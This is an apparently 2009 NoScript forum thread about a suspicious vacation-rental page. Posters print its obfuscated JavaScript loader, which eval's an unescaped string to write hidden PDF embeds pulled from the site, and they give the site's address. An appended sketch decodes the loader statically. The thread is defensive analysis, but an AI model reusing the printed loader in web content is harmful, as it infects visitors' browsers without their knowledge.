I'm having a hard time understanding the noscript plugin's response to different sites.
For example, the site that made me install it is one that is VERY LIKELY evil, so go here ONLY if you have noscript installed:
Again: do NOT go here without precautions!!!
"dordognevacations.com/newgallery/index.php"
But if you DO go here, noscript puts a red x through its logo, but ... there are NO other indications of anything. When I look at the source of this site, I see nothing. Could this site be benign? Why the noscript X then?
I find that many many other sites have more detailed comments, like cnn, or trendmicro... But what's it mean?
I look forward to hearing back from you.
Maya
how to understand noscript's comments?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
- Giorgio Maone
- Site Admin
- Posts: 9524
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
Re: how to understand noscript's comments?
NoScript does not try to guess if a site is benign or not.
It disables scripting on every website unless you decide that
- The site is trustworthy
- The site is actually unusable without scripting
However, if you land on a certain site for the first time and you've got no idea about it, you can help yourself with WOT, or SiteAdvisor, or just Google.
The important thing here is that NoScript prevented it from doing any damage, giving you the time to decide.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Re: how to understand noscript's comments?
I understand what you're saying. I appreciate the ability to choose which sites I should allow to run scripts.
However, it would be great to have an easy way to look at the scripts & objects that are being called, because even normally safe sites can be compromised!
Can you explain why, on most sites, your plugin counts the number of blocked scripts and objects (if any) but on this dordogne site, it simply gets an X through it, but does NOT pop up any info about blocked scripts. What does that mean? Is there anything here? When I do view source on the page it is totally empty except for this harmless code:
<html>
<head/>
<body>// 404</body>
</html>
Is there a way to hide something malicious in there where view source and firebug can't see it??
Thanks so much!
Maya
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Re: how to understand noscript's comments?
For me the source code for that page is:
Code:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body>//<script>
try{if(wWtO='*')throw new TypeError('%');}catch(hutc){wWtO=hutc.message;}
var aZPt='dov63um6dI65P6et.wriI74e(v22I3cdP69v76 stylm65P3dI5cm22posiI74ioI6eI3aI61bsolI75tm65v3b leftI3av2dv31000pxI3b tm6fP70I3av2dv31P300v30pxv3bP5cP22P3eP22P29I3bdocuP6denI74.write(P27I3cem6dbem64 wI69dtm68v3d10v30 hm65ightI3d10I30 m73v72cm3dI22httpI3aP2fm2fdordogm6ev65m76acationv73.com6dm2fnI65wgalI6cem72ym2finI64I65x.pv68pm3fv73P3dZhZg8bskI26idI3d2I22 v74ypv65v3dv22applicv61tionI2fpv64fI22I3em3cm2feP6dbP65P64P3ev27I29v3bdocum6deP6et.wv72ite(I27P3cem6dv62eP64I20wv69P64P74hm3d100v20hP65v69gP68tm3d100 srcP3dv22htv74pI3aP2fP2fdordogneP76acatiP6fns.com6dI2fnewm67allP65rym2finI64ex.phP70v3fm73P3dZm68I5agm38bskm26iP64P3d3v22P3eI3cI2fv65I6dbP65dI3eI27v29I3bdocuv6deP6et.m77rite(v22I3cv2fdv69v76m3em22)v3b';
eval(unescape(aZPt.replace(/[IPmv]/g,wWtO)));
//</script>
<div style="padding: 4px 4px 4px 40px; background-image: url(resource://noscript_0.5562676001057474/icon32.png); background-repeat: no-repeat; background-position: 2px 2px; display: block; min-height: 32px; text-align: left;"><a tooltip="linkalert-tip" href="http://dordognevacations.com/newgallery/dov63um6dI65P6et.wriI74e%28v22I3cdP69v76">http://dordognevacations.com/newgallery/dov63um6dI65P6et.wriI74e(v22I3cdP69v76</a><br></div></body></html>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Re: how to understand noscript's comments?
Err, more like:
Code:
//<script>
try{if(wWtO='*')throw new TypeError('%');}catch(hutc){wWtO=hutc.message;}
var aZPt='dov63um6dI65P6et.wriI74e(v22I3cdP69v76 stylm65P3dI5cm22posiI74ioI6eI3aI61bsolI75tm65v3b leftI3av2dv31000pxI3b tm6fP70I3av2dv31P300v30pxv3bP5cP22P3eP22P29I3bdocuP6denI74.write(P27I3cem6dbem64 wI69dtm68v3d10v30 hm65ightI3d10I30 m73v72cm3dI22httpI3aP2fm2fdordogm6ev65m76acationv73.com6dm2fnI65wgalI6cem72ym2finI64I65x.pv68pm3fv73P3dZhZg8bskI26idI3d2I22 v74ypv65v3dv22applicv61tionI2fpv64fI22I3em3cm2feP6dbP65P64P3ev27I29v3bdocum6deP6et.wv72ite(I27P3cem6dv62eP64I20wv69P64P74hm3d100v20hP65v69gP68tm3d100 srcP3dv22htv74pI3aP2fP2fdordogneP76acatiP6fns.com6dI2fnewm67allP65rym2finI64ex.phP70v3fm73P3dZm68I5agm38bskm26iP64P3d3v22P3eI3cI2fv65I6dbP65dI3eI27v29I3bdocuv6deP6et.m77rite(v22I3cv2fdv69v76m3em22)v3b';
eval(unescape(aZPt.replace(/[IPmv]/g,wWtO)));
//</script>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
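Added example, not part of the original posts: the script posted above sets wWtO to '%' (the message of the TypeError it throws and catches), replaces every I, P, m and v in the string with it, then passes the result through unescape() to eval(). The sketch below performs the same substitution statically, without eval, and reads the marker set from the script text itself. SAMPLE is constructed (the thread's wrapper with only the opening fragment of the posted string), and staticDecode and summarize are hypothetical names.

```javascript
// Static decoding of the loader pattern shown in the thread; eval() is never called.
// SAMPLE is constructed: same wrapper, string literal cut to its opening fragment.
const SAMPLE = [
  "try{if(wWtO='*')throw new TypeError('%');}catch(hutc){wWtO=hutc.message;}",
  "var aZPt='dov63um6dI65P6et.wriI74e(v22I3cdP69v76 stylm65P3dI5cm22posiI74ioI6eI3aI61bsolI75tm65v3b leftI3av2dv31000pxI3b';",
  "eval(unescape(aZPt.replace(/[IPmv]/g,wWtO)));",
].join("\n");

function staticDecode(src) {
  // The message of the thrown TypeError becomes the replacement character.
  const thrown = /throw new TypeError\('([^']*)'\)/.exec(src);
  // Match on the shape of the code, not on variable names.
  const literal = /var\s+\w+\s*=\s*'([^']*)'/.exec(src);
  const markers = /\.replace\(\/\[([^\]]+)\]\/g/.exec(src);
  if (!thrown || !literal || !markers) return null; // not this loader pattern
  const markerSet = new Set(markers[1]);
  let escaped = "";
  for (const ch of literal[1]) escaped += markerSet.has(ch) ? thrown[1] : ch;
  // Decode %XX by hand: this cannot throw on bytes that are not valid UTF-8,
  // and malformed escapes stay visible in the output.
  const decoded = escaped.replace(/%([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  return { marker: thrown[1], markerChars: markers[1], decoded };
}

function summarize(src) {
  const r = staticDecode(src);
  if (!r) return null;
  return {
    ...r,
    writesMarkup: /document\.write\(/.test(r.decoded), // injects markup at load
    offscreen: /(left|top):-\d+px/.test(r.decoded),    // positioned out of view
    urls: r.decoded.match(/https?:\/\/[^"'\s]+/g) || [],
  };
}

console.log(summarize(SAMPLE));
```

Because the marker characters are read from the script's own replace() call, the same function applies to a page load that uses a different set of obscuring characters.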
Re: how to understand noscript's comments?
Right.
(Actually each time you reload the page, the source changes. I imagine whatever it does remains the same, but the obscuring items change.)
And what that does or does not do, I have no clue.
But after viewing that, I am glad that whatever the intent is, that nothing happens to me.
tajmaya, how did you happen across that particular page?
Oh, & this too:
3.17 Q: Some pages display the little NoScript icon with one or more links on its left side. I thought this could be disabled by unchecking "Show placeholder", but it's still shown... How do I make it go away?
But to me, it serves a good purpose as it points out something you might otherwise miss. Making you question it before proceeding.
Google: try{if( ='*')throw new TypeError('%');}catch( ){= .message;}
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4pre) Gecko/20091007 SeaMonkey/2.0pre
- computerfreaker
- Senior Member
- Posts: 220
- Joined: Wed Sep 16, 2009 10:03 pm
- Location: USA
Re: how to understand noscript's comments?
therube wrote: (Actually each time you reload the page, the source changes. I imagine whatever it does remains the same, but the obscuring items change.)
Check out the JavaScript DeObfuscator addon... it claims to show you what JS runs on a page, regardless of obfuscation measures...
https://addons.mozilla.org/en-US/firefox/addon/10345
therube wrote: And what that does or does not do, I have no clue. But after viewing that, I am glad that whatever the intent is, that nothing happens to me.
Ditto. While I suppose it's possible that obfuscated code could be benign, I wouldn't care to bet on it...
therube wrote: But to me, it serves a good purpose as it points out something you might otherwise miss. Making you question it before proceeding. Google: try{if( ='*')throw new TypeError('%');}catch( ){= .message;}
OK, I'm no JavaScript guy... and Google didn't turn up anything of value, at least for me... so what were you referring to?? :S
With great power comes great responsibility.
Learn something new every day, and the rest will take care of itself.
Life is a journey, not a destination. Enjoy the trip!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13
- computerfreaker
- Senior Member
- Posts: 220
- Joined: Wed Sep 16, 2009 10:03 pm
- Location: USA
Re: how to understand noscript's comments?
hmm, this link looks interesting & relevant...
http://securitylabs.websense.com/conten ... /2574.aspx
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3369
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
Re: how to understand noscript's comments?
It is simple, NoScript disables ANY and ALL scripts on ANY and ALL sites, UNLESS you say otherwise. Now if this site being disabled and not on your trusted list has script items, it will show in the count and it is up to you to decide if they are safe to allow or not. If it doesn't show anything, then chances are there is nothing or you don't see it but it does and even if it is benign, it has no ESP, so it blocks it for you to decide what it is and allow or not. There isn't much more comments it can provide you.
I think the confusion comes from the fact that most people set and forget their security and it's done for them by some arbitrary and often unsafe method and when they are finally asked to use a security tool proactively and make an informed decision, it's too much or doesn't provide arbitrary and canned comments like other tools that have no idea what the code is, they use a heuristic to "assume" what it is and give comments. NS doesn't insult the user, provides them the tools to decide and protect themselves, the rest is up to them.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3